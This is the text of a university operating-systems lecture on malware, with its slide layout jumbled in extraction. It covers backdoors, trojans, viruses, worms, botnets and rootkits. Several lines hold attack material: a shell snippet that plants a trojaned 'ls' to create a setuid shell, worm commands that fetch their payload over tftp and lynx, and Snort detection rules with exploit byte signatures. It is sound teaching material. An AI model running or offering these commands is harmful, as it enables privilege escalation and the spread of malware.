Operating Systems Principles

CSC501 Operating Systems Principles Malware

A Quick Recap q Previous Lecture Q Code Injection Attacks q Today: Q Malware 2

What is Malicious Software? q Malicious Software (a.k.a. Malware) Q Software designed to infiltrate or damage a computer system, without the owner's informed consent -- http://en.wikipedia.org/wiki/malware Q Examples: Viruses, worms, Trojan horses, spyware, and other malicious and unwanted software Q How about adware? q Malware references the intent of the creator, rather than any particular features Q DRM v.s. Rootkit (e.g., Sony CD rootkit)

Why should we care? q Malware remains a top threat Blaster CodeRed Nimda Source: Symantec Internet Security Conficker Threat Report Worm Infection Map (as of 4/1/09) from CWG

Recent Trends q Recruiting Vulnerable Nodes Ł Attack Network Q Zero-day exploits w/o software patches Q New attack strategies Exploiting vulnerable client-side software, such as IE Propagating malware with RFID tags, cell phones Q Fast massive replications q Providing Value-Added Services Q DDoS, spamming, or other malicious purposes Q Sell/rent attack networks for profit

Taxonomy of Malicious Software Malicious Programs Needs Host Program Independent backdoors Logic Bombs Trojan Horses Viruses Worms Zombies Rootkits Replicate

Backdoor q Secret entry point into a system Q Specific user identifier or password that circumvents normal security procedures. q Commonly used by developers Q Could be included in a compiler.

Logic Bomb q Embedded in legitimate programs q Activated when specified conditions met Q E.g., presence/absence of some file; Particular date/time or particular user q When triggered, typically damages system Q Modify/delete files/disks

Trojan Horse q q Program with an expected and hidden effect Q Q Appears normal/expected hidden effect violates security policy User tricked into executing Trojan horse Q Q Expects (and sees) expected behavior Hidden effect performed with user s authorization q Attacker: cat >/homes/victim/ls<<eof cp /bin/sh/tmp/.xxsh chmodu+s,o+x/tmp/.xxsh rm./ls ls$* eof q Victim ls

Virus q Self-replicating code Q Alters normal code with infected version Q Generally tries to remain undetected q Operates when infected code executed If spread condition then For target files if not infected then alter to include virus Perform malicious action Execute normal program

Worm q Runs independently Q Does not require a host program q Propagates a fully working version of itself to other machines q Carries a payload performing hidden tasks Q Backdoors, spam relays, DDoS agents; q Phases Q Probing Ł Exploitation Ł Replication Ł Payload

Worm Propagation 1:Target Probing 2: Vulnerability Exploitation A Worm 3: Replication A Victim A Staged View of Worm Infection

MSBlast Worm (Aug., 2003) 10. Closes connection 11. Shell closes 8. Sends START msblast.exe command 9. Runs worm on target! >tftp I 192.168.0.1 GET msblast.exe 6. Sends TFTP command to shell 5. Creates TFTP Server on port 69/UDP 3. Connects to target on port 4444/TCP 1. Exploits target on port 135/TCP 2. Binds svchost.exe to port Blaster 192.168.0.1 7. Runs TFTP command; teleports msblast.exe file 4. Creates a shell cmd.exe and binds it to port 4444/TCP 4444/TCP via injected code alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"rpc DCOM exploit/ Blaster Worm Target/RPC Attack"; content:" 77 65 6b d6 93 CD C2 94192.168.10.11 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B "; )

Example II : Lion/Linux Worm alert tcp $HOME_NET any -> 4. Runs worm on target! 3. Replicate worms on port 27374/TCP $EXTERNAL_NET 27374 (msg:"misc Lion worm"; flow:to_server,established; >lynx -source http://xxx.xxx.xxx.xxx:27374 content:"get 3. Runs "; a shell depth:8; command 2. Exploit target on port 53/TCP Lion 192.168.0.1 alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"dns EXPLOIT named tsig overflow attempt"; flow:to_server,established; content:" AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61 "; reference:cve,cve-2001-0010; ) Target/BIND 192.168.10.11 1. Checks reach-ability by connecting 53/TCP nocase; sid:514; )

Zombie q Secretly takes over another networked computer by exploiting software flows q Builds the compromised computers into a zombie network or botnet q Uses it to indirectly launch attacks Q E.g., DDoS

Detailed Steps (1) Attacker 1 Attacker scans Internet for unsecured systems that can be compromised Unsecured Computers Internet

Detailed Steps (2) Attacker 2 Attacker secretly installs zombie agent programs, turning unsecured computers into zombies Unsecured Zombies Computersbie Internet

Detailed Steps (3) Attacker 3 Zombie agents ``phone home and connect to a master server Zombies Master Server Internet

Detailed Steps (4) Attacker 4 Attacker sends commands to Master Server to launch a DDoS attack against a targeted system Zombies Master Server Internet

Detailed Steps (5) Attacker 5 Master Server sends signal to zombies to launch attack on targeted system Zombies Master Server Internet Targeted System System

Detailed Steps (6) Attacker 6 Targeted system is overwhelmed by zombie requests, denying requests from normal users Zombies Master Server Internet User Request Denied Targeted System System

Rootkit q A rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer q Goals: Q Hide malicious resources (e.g., processes, files, registry keys, open ports, etc.) Q Provide hidden backdoor access

(_) _ \ _ _(_) _ '_ \ \ \/ / _) / _ \ / _ \ / / _ > < _ < (_) (_) _ < _ _ _ _ \,_/_/\_\ _ \_\ / \ / \ _ \_\_ \ ls du ifconfig netstat chfn chsh inetd login passwd ps top rshd syslogd linsniffer fix z2 wted lled bindshell tcpd Trojaned! Hide files Trojaned! Hide files Trojaned! Hide sniffing Trojaned! Hide connections Trojaned! User->r00t Trojaned! User->r00t Trojaned! Remote access Trojaned! Remote access Trojaned! User->r00t Trojaned! Hide processes Trojaned! Hide processes Trojaned! Remote access Trojaned! Hide logs Packet sniffer! File fixer! Zap2 utmp/wtmp/lastlog eraser! wtmp/utmp editor! lastlog editor! port/shell type daemon! Trojaned! Hide connections, avoid denies

Rootkit q Simple rootkits: Q Modify user programs (ls, ps) Q Detectable by tools like Tripwire q Sophisticated rootkits: Q Modify the kernel itself Q Hard to detect from userland

Rootkit Classification Application-level Rootkit (I) Application-level Rootkit (II) Kernel-level RootKit Evil Program Trojan login Trojan ps Trojan ifconfig good tripwire good good good good good login good ps good ifconfig good tripwire program program program program Kernel Kernel Kernel Trojan Kernel Module Lrk5, t0rn Hxdef, NTIllusion Shadow Walker, adore

Rootkit Classification Under-Kernel RootKit good good good good login ps ifconfig tripwire SubVirt, ``Blue Pill Kernel Evil VMM

Next Lecture q Protection